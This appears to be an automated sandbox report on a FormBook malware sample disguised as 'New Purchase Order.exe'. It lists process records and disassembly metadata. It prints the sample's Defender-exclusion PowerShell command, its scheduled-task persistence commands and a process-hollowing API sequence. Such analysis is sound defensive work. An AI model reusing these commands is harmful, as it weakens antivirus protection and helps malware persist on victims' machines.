              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:5
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
              Imagebase:0xd10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:6
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:7
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpBCD4.tmp"
              Imagebase:0x980000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:8
              Start time:03:01:58
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:9
              Start time:03:01:59
              Start date:18/09/2024
              Path:C:\Users\user\Desktop\New Purchase Order.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
              Imagebase:0xc20000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              General

              Target ID:10
              Start time:03:02:00
              Start date:18/09/2024
              Path:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              Imagebase:0xf40000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 29%, ReversingLabs
              • Detection: 33%, Virustotal, Browse
              Reputation:low
              Has exited:true

              General

              Target ID:11
              Start time:03:02:01
              Start date:18/09/2024
              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Imagebase:0x7ff717f30000
              File size:496'640 bytes
              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
              Has elevated privileges:true
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:12
              Start time:03:02:04
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hbaiQWstL" /XML "C:\Users\user\AppData\Local\Temp\tmpD3A8.tmp"
              Imagebase:0x980000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:13
              Start time:03:02:04
              Start date:18/09/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:14
              Start time:03:02:05
              Start date:18/09/2024
              Path:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Roaming\hbaiQWstL.exe"
              Imagebase:0xb50000
              File size:733'696 bytes
              MD5 hash:E392C45451247441D1763095DB3CD57A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:16
              Start time:03:02:16
              Start date:18/09/2024
              Path:C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe"
              Imagebase:0x930000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              General

              Target ID:17
              Start time:03:02:18
              Start date:18/09/2024
              Path:C:\Windows\SysWOW64\setupugc.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\setupugc.exe"
              Imagebase:0xff0000
              File size:118'784 bytes
              MD5 hash:342CBB77B3F4B3F073DF2F042D20E121
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              General

              Target ID:20
              Start time:03:02:31
              Start date:18/09/2024
              Path:C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe"
              Imagebase:0x930000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Has exited:false

              General

              Target ID:22
              Start time:03:02:44
              Start date:18/09/2024
              Path:C:\Program Files\Mozilla Firefox\firefox.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
              Imagebase:0x7ff728280000
              File size:676'768 bytes
              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:10.9%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:6%
                Total number of Nodes:201
                Total number of Limit Nodes:16
                execution_graph 26787 808ce5e 26788 808ce61 26787->26788 26789 808cbe4 26787->26789 26791 808cc9b 26789->26791 26793 808fac0 26789->26793 26790 808ccb0 26794 808fada 26793->26794 26795 808fae2 26794->26795 26812 74d042a 26794->26812 26816 74d0712 26794->26816 26823 74d0796 26794->26823 26831 74d02b7 26794->26831 26835 74d0af4 26794->26835 26840 74d04de 26794->26840 26845 74d02fe 26794->26845 26850 74d041f 26794->26850 26855 74d04fd 26794->26855 26860 74d0bc3 26794->26860 26865 74d0463 26794->26865 26870 74d0040 26794->26870 26879 74d0260 26794->26879 26884 74d0600 26794->26884 26889 74d0006 26794->26889 26898 74d03c5 26794->26898 26795->26790 26904 808c479 26812->26904 26908 808c480 26812->26908 26813 74d044b 26912 808bf68 26816->26912 26916 808bf70 26816->26916 26817 74d0617 26920 808beb8 26817->26920 26924 808bec0 26817->26924 26818 74d0bef 26824 74d0617 26823->26824 26825 74d0711 26823->26825 26827 808beb8 ResumeThread 26824->26827 26828 808bec0 ResumeThread 26824->26828 26829 808bf68 Wow64SetThreadContext 26825->26829 26830 808bf70 Wow64SetThreadContext 26825->26830 26826 74d0bef 26827->26826 26828->26826 26829->26824 26830->26824 26928 808c539 26831->26928 26932 808c540 26831->26932 26832 74d02df 26836 74d0269 26835->26836 26837 74d027b 26836->26837 26936 808c628 26836->26936 26940 808c630 26836->26940 26837->26795 26841 74d04ea 26840->26841 26842 74d05e4 26841->26842 26843 808bf68 Wow64SetThreadContext 26841->26843 26844 808bf70 Wow64SetThreadContext 26841->26844 26842->26795 26843->26842 26844->26842 26846 74d0304 26845->26846 26848 808c539 WriteProcessMemory 26846->26848 26849 808c540 WriteProcessMemory 26846->26849 26847 74d0339 26847->26795 26848->26847 26849->26847 26851 74d0269 26850->26851 26851->26850 26852 74d027b 26851->26852 26853 808c628 ReadProcessMemory 26851->26853 26854 808c630 ReadProcessMemory 26851->26854 26852->26795 26853->26851 26854->26851 26856 74d050d 26855->26856 26858 808c539 WriteProcessMemory 26856->26858 26859 808c540 WriteProcessMemory 26856->26859 26857 74d09d7 26858->26857 26859->26857 26861 74d0bc9 26860->26861 26863 808beb8 ResumeThread 26861->26863 26864 808bec0 ResumeThread 26861->26864 26862 74d0bef 26863->26862 26864->26862 26866 74d0470 26865->26866 26868 808beb8 ResumeThread 26866->26868 26869 808bec0 ResumeThread 26866->26869 26867 74d0bef 26868->26867 26869->26867 26872 74d0073 26870->26872 26871 74d0179 26871->26795 26872->26871 26944 808c7c8 26872->26944 26948 808c7bd 26872->26948 26880 74d0269 26879->26880 26881 74d027b 26880->26881 26882 808c628 ReadProcessMemory 26880->26882 26883 808c630 ReadProcessMemory 26880->26883 26881->26795 26882->26880 26883->26880 26885 74d0606 26884->26885 26887 808beb8 ResumeThread 26885->26887 26888 808bec0 ResumeThread 26885->26888 26886 74d0bef 26887->26886 26888->26886 26891 74d0073 26889->26891 26890 74d0179 26890->26795 26891->26890 26896 808c7c8 CreateProcessA 26891->26896 26897 808c7bd CreateProcessA 26891->26897 26892 74d027b 26892->26795 26893 74d0241 26893->26892 26894 808c628 ReadProcessMemory 26893->26894 26895 808c630 ReadProcessMemory 26893->26895 26894->26893 26895->26893 26896->26893 26897->26893 26899 74d0315 26898->26899 26900 74d06ff 26899->26900 26902 808c539 WriteProcessMemory 26899->26902 26903 808c540 WriteProcessMemory 26899->26903 26900->26795 26901 74d0339 26901->26795 26902->26901 26903->26901 26905 808c480 VirtualAllocEx 26904->26905 26907 808c4fd 26905->26907 26907->26813 26909 808c4c0 VirtualAllocEx 26908->26909 26911 808c4fd 26909->26911 26911->26813 26913 808bf70 Wow64SetThreadContext 26912->26913 26915 808bffd 26913->26915 26915->26817 26917 808bfb5 Wow64SetThreadContext 26916->26917 26919 808bffd 26917->26919 26919->26817 26921 808bec0 ResumeThread 26920->26921 26923 808bf31 26921->26923 26923->26818 26925 808bf00 ResumeThread 26924->26925 26927 808bf31 26925->26927 26927->26818 26929 808c588 WriteProcessMemory 26928->26929 26931 808c5df 26929->26931 26931->26832 26933 808c588 WriteProcessMemory 26932->26933 26935 808c5df 26933->26935 26935->26832 26937 808c630 ReadProcessMemory 26936->26937 26939 808c6bf 26937->26939 26939->26836 26941 808c67b ReadProcessMemory 26940->26941 26943 808c6bf 26941->26943 26943->26836 26945 808c851 CreateProcessA 26944->26945 26947 808ca13 26945->26947 26949 808c7c8 CreateProcessA 26948->26949 26951 808ca13 26949->26951 26775 2cfd788 DuplicateHandle 26776 2cfd81e 26775->26776 26962 2cf4668 26963 2cf467a 26962->26963 26964 2cf4686 26963->26964 26968 2cf4778 26963->26968 26973 2cf4218 26964->26973 26966 2cf46a5 26969 2cf479d 26968->26969 26977 2cf4879 26969->26977 26981 2cf4888 26969->26981 26974 2cf4223 26973->26974 26989 2cf5cec 26974->26989 26976 2cf7110 26976->26966 26979 2cf48af 26977->26979 26978 2cf498c 26978->26978 26979->26978 26985 2cf44e0 26979->26985 26983 2cf48af 26981->26983 26982 2cf498c 26982->26982 26983->26982 26984 2cf44e0 CreateActCtxA 26983->26984 26984->26982 26986 2cf5918 CreateActCtxA 26985->26986 26988 2cf59db 26986->26988 26990 2cf5cf7 26989->26990 26993 2cf5d0c 26990->26993 26992 2cf738d 26992->26976 26994 2cf5d17 26993->26994 26997 2cf5d3c 26994->26997 26996 2cf7462 26996->26992 26998 2cf5d47 26997->26998 27001 2cf5d6c 26998->27001 27000 2cf7565 27000->26996 27002 2cf5d77 27001->27002 27004 2cf8acb 27002->27004 27007 2cfad71 27002->27007 27003 2cf8b09 27003->27000 27004->27003 27011 2cfce61 27004->27011 27016 2cfb1a0 27007->27016 27020 2cfb1b0 27007->27020 27008 2cfad86 27008->27004 27012 2cfce91 27011->27012 27013 2cfceb5 27012->27013 27028 2cfd418 27012->27028 27032 2cfd428 27012->27032 27013->27003 27017 2cfb1b0 27016->27017 27023 2cfb299 27017->27023 27018 2cfb1bf 27018->27008 27022 2cfb299 GetModuleHandleW 27020->27022 27021 2cfb1bf 27021->27008 27022->27021 27024 2cfb2dc 27023->27024 27025 2cfb2b9 27023->27025 27024->27018 27025->27024 27026 2cfb4e0 GetModuleHandleW 27025->27026 27027 2cfb50d 27026->27027 27027->27018 27029 2cfd428 27028->27029 27030 2cfd46f 27029->27030 27036 2cfd230 27029->27036 27030->27013 27033 2cfd435 27032->27033 27034 2cfd46f 27033->27034 27035 2cfd230 GetModuleHandleW 27033->27035 27034->27013 27035->27034 27037 2cfd23b 27036->27037 27039 2cfdd80 27037->27039 27040 2cfd35c 27037->27040 27039->27039 27041 2cfd367 27040->27041 27042 2cf5d6c GetModuleHandleW 27041->27042 27043 2cfddef 27042->27043 27043->27039 26952 74d0ed0 26953 74d105b 26952->26953 26954 74d0ef6 26952->26954 26954->26953 26957 74d1148 26954->26957 26960 74d1150 PostMessageW 26954->26960 26958 74d1150 PostMessageW 26957->26958 26959 74d11bc 26958->26959 26959->26954 26961 74d11bc 26960->26961 26961->26954 26777 2cfd540 26778 2cfd586 GetCurrentProcess 26777->26778 26780 2cfd5d8 GetCurrentThread 26778->26780 26782 2cfd5d1 26778->26782 26781 2cfd615 GetCurrentProcess 26780->26781 26783 2cfd60e 26780->26783 26786 2cfd64b 26781->26786 26782->26780 26783->26781 26784 2cfd673 GetCurrentThreadId 26785 2cfd6a4 26784->26785 26786->26784

                Executed Functions

                Function 074D0040 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: (
                • API String ID: 0-3887548279
                • Opcode ID: ebcbbbfa7f351416fea88705d29ffa82dd1b5ba1fed6e6b5b9a7924c3c539de0
                • Instruction ID: 71d69c5902de1d3b9cc28d02a63cdd1e20c5c890d5e22dfb524f900439fcec66
                • Opcode Fuzzy Hash: ebcbbbfa7f351416fea88705d29ffa82dd1b5ba1fed6e6b5b9a7924c3c539de0
                • Instruction Fuzzy Hash: D291F4B1D19229CFDB24CF66C8547EDBBB6BF9A300F0095AAD449A7250EB705E85CF40
                Function 074D1DF0 Relevance: .4, Instructions: 409COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a8a85044744f54851b3e7e512d0547e863cebf9b2dd861f1d4df4082ff7625e5
                • Instruction ID: 5f098241db23400bacfcff1f92b9d0f6936a4dbf9bc65af8dcb0fe123df367f6
                • Opcode Fuzzy Hash: a8a85044744f54851b3e7e512d0547e863cebf9b2dd861f1d4df4082ff7625e5
                • Instruction Fuzzy Hash: E9E1ABB0B006069FDB59DB65C860BAFB7F6AF89300F14446ED6899B390CB70ED02CB51
                Function 074D038F Relevance: .0, Instructions: 22COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f1e3f692e5cec98b5b82e189d009f3ab67543f03b29b56b9a5b913363e2c1a3a
                • Instruction ID: c99dd02b8b8313531c3d91165a77225f8871da220cdb6f75cd05ee3e60642207
                • Opcode Fuzzy Hash: f1e3f692e5cec98b5b82e189d009f3ab67543f03b29b56b9a5b913363e2c1a3a
                • Instruction Fuzzy Hash: 4AE0E5B481D384CFCB128F70E8695E8BFB8AB0B315F0525D6984D9B262D7349D86CE06
                Function 02CFD530 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 02CFD5BE
                • GetCurrentThread.KERNEL32 ref: 02CFD5FB
                • GetCurrentProcess.KERNEL32 ref: 02CFD638
                • GetCurrentThreadId.KERNEL32 ref: 02CFD691
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: f524b3177d5f74c706681bf0c702ae05c91a927a32d746ba2c02181cbeef1910
                • Instruction ID: e83f2866c141737661ce0293a7c5f8daa1fe1bc1eb7f813d26bd4a10f408eb20
                • Opcode Fuzzy Hash: f524b3177d5f74c706681bf0c702ae05c91a927a32d746ba2c02181cbeef1910
                • Instruction Fuzzy Hash: BB5169B09003498FDB94CFA9D548B9EBBF1BF89318F20845AE509A73A0DB745944CB65
                Function 02CFD540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetCurrentProcess.KERNEL32 ref: 02CFD5BE
                • GetCurrentThread.KERNEL32 ref: 02CFD5FB
                • GetCurrentProcess.KERNEL32 ref: 02CFD638
                • GetCurrentThreadId.KERNEL32 ref: 02CFD691
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: a435038ee65755a3fdd74906819327e2dda6f7940e0200526c22fcaa932fa961
                • Instruction ID: 80bf1d7669aa864e0f3093782029b8e64edf6e1be504d5be79e9c033d215df05
                • Opcode Fuzzy Hash: a435038ee65755a3fdd74906819327e2dda6f7940e0200526c22fcaa932fa961
                • Instruction Fuzzy Hash: E75148B09003498FDB94CFA9D648B9EBBF1FF88318F208459E509A73A0DB745944CF65
                Function 0808C7BD Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 45 808c7bd-808c85d 48 808c85f-808c869 45->48 49 808c896-808c8b6 45->49 48->49 50 808c86b-808c86d 48->50 54 808c8b8-808c8c2 49->54 55 808c8ef-808c91e 49->55 51 808c86f-808c879 50->51 52 808c890-808c893 50->52 56 808c87b 51->56 57 808c87d-808c88c 51->57 52->49 54->55 58 808c8c4-808c8c6 54->58 65 808c920-808c92a 55->65 66 808c957-808ca11 CreateProcessA 55->66 56->57 57->57 59 808c88e 57->59 60 808c8c8-808c8d2 58->60 61 808c8e9-808c8ec 58->61 59->52 63 808c8d4 60->63 64 808c8d6-808c8e5 60->64 61->55 63->64 64->64 67 808c8e7 64->67 65->66 68 808c92c-808c92e 65->68 77 808ca1a-808caa0 66->77 78 808ca13-808ca19 66->78 67->61 70 808c930-808c93a 68->70 71 808c951-808c954 68->71 72 808c93c 70->72 73 808c93e-808c94d 70->73 71->66 72->73 73->73 75 808c94f 73->75 75->71 88 808cab0-808cab4 77->88 89 808caa2-808caa6 77->89 78->77 91 808cac4-808cac8 88->91 92 808cab6-808caba 88->92 89->88 90 808caa8 89->90 90->88 94 808cad8-808cadc 91->94 95 808caca-808cace 91->95 92->91 93 808cabc 92->93 93->91 97 808caee-808caf5 94->97 98 808cade-808cae4 94->98 95->94 96 808cad0 95->96 96->94 99 808cb0c 97->99 100 808caf7-808cb06 97->100 98->97 102 808cb0d 99->102 100->99 102->102
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0808C9FE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: b39b7f754cb84f69b8d850a067f874d4b7378e385c19caa75c9f958d4fed1bcd
                • Instruction ID: d9c87e001a5b1642eef819826e7293d5f37ce2d7ca6d7409b3b90a41c461e3a0
                • Opcode Fuzzy Hash: b39b7f754cb84f69b8d850a067f874d4b7378e385c19caa75c9f958d4fed1bcd
                • Instruction Fuzzy Hash: EEA15971D00259DFEFA0DF68C8817EDBBF2AF48315F1481A9E849A7240DB749985CFA1
                Function 0808C7C8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 103 808c7c8-808c85d 105 808c85f-808c869 103->105 106 808c896-808c8b6 103->106 105->106 107 808c86b-808c86d 105->107 111 808c8b8-808c8c2 106->111 112 808c8ef-808c91e 106->112 108 808c86f-808c879 107->108 109 808c890-808c893 107->109 113 808c87b 108->113 114 808c87d-808c88c 108->114 109->106 111->112 115 808c8c4-808c8c6 111->115 122 808c920-808c92a 112->122 123 808c957-808ca11 CreateProcessA 112->123 113->114 114->114 116 808c88e 114->116 117 808c8c8-808c8d2 115->117 118 808c8e9-808c8ec 115->118 116->109 120 808c8d4 117->120 121 808c8d6-808c8e5 117->121 118->112 120->121 121->121 124 808c8e7 121->124 122->123 125 808c92c-808c92e 122->125 134 808ca1a-808caa0 123->134 135 808ca13-808ca19 123->135 124->118 127 808c930-808c93a 125->127 128 808c951-808c954 125->128 129 808c93c 127->129 130 808c93e-808c94d 127->130 128->123 129->130 130->130 132 808c94f 130->132 132->128 145 808cab0-808cab4 134->145 146 808caa2-808caa6 134->146 135->134 148 808cac4-808cac8 145->148 149 808cab6-808caba 145->149 146->145 147 808caa8 146->147 147->145 151 808cad8-808cadc 148->151 152 808caca-808cace 148->152 149->148 150 808cabc 149->150 150->148 154 808caee-808caf5 151->154 155 808cade-808cae4 151->155 152->151 153 808cad0 152->153 153->151 156 808cb0c 154->156 157 808caf7-808cb06 154->157 155->154 159 808cb0d 156->159 157->156 159->159
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0808C9FE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 97a122580fc34411e8db9529b4095e913d7197f6b5bdd7e75cf20631373545f4
                • Instruction ID: 5cdea19fd17d6eefa69083df42b3c24c972807448b639fa331b70f9a744764dc
                • Opcode Fuzzy Hash: 97a122580fc34411e8db9529b4095e913d7197f6b5bdd7e75cf20631373545f4
                • Instruction Fuzzy Hash: A6915A71D00219DFEF90DF68C8417AEBBF2BF48315F1485A9E849A7240DB749985CFA1
                Function 02CFB299 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 160 2cfb299-2cfb2b7 161 2cfb2b9-2cfb2c6 call 2cfaf38 160->161 162 2cfb2e3-2cfb2e7 160->162 168 2cfb2dc 161->168 169 2cfb2c8 161->169 164 2cfb2fb-2cfb33c 162->164 165 2cfb2e9-2cfb2f3 162->165 171 2cfb33e-2cfb346 164->171 172 2cfb349-2cfb357 164->172 165->164 168->162 217 2cfb2ce call 2cfb533 169->217 218 2cfb2ce call 2cfb540 169->218 171->172 173 2cfb37b-2cfb37d 172->173 174 2cfb359-2cfb35e 172->174 179 2cfb380-2cfb387 173->179 176 2cfb369 174->176 177 2cfb360-2cfb367 call 2cfaf44 174->177 175 2cfb2d4-2cfb2d6 175->168 178 2cfb418-2cfb496 175->178 181 2cfb36b-2cfb379 176->181 177->181 210 2cfb49a-2cfb4d8 178->210 211 2cfb498-2cfb499 178->211 182 2cfb389-2cfb391 179->182 183 2cfb394-2cfb39b 179->183 181->179 182->183 186 2cfb39d-2cfb3a5 183->186 187 2cfb3a8-2cfb3b1 call 2cfaf54 183->187 186->187 191 2cfb3be-2cfb3c3 187->191 192 2cfb3b3-2cfb3bb 187->192 193 2cfb3c5-2cfb3cc 191->193 194 2cfb3e1-2cfb3ee 191->194 192->191 193->194 196 2cfb3ce-2cfb3de call 2cfaf64 call 2cfaf74 193->196 201 2cfb411-2cfb417 194->201 202 2cfb3f0-2cfb40e 194->202 196->194 202->201 212 2cfb4da-2cfb4dd 210->212 213 2cfb4e0-2cfb50b GetModuleHandleW 210->213 211->210 212->213 214 2cfb50d-2cfb513 213->214 215 2cfb514-2cfb528 213->215 214->215 217->175 218->175
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 02CFB4FE
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
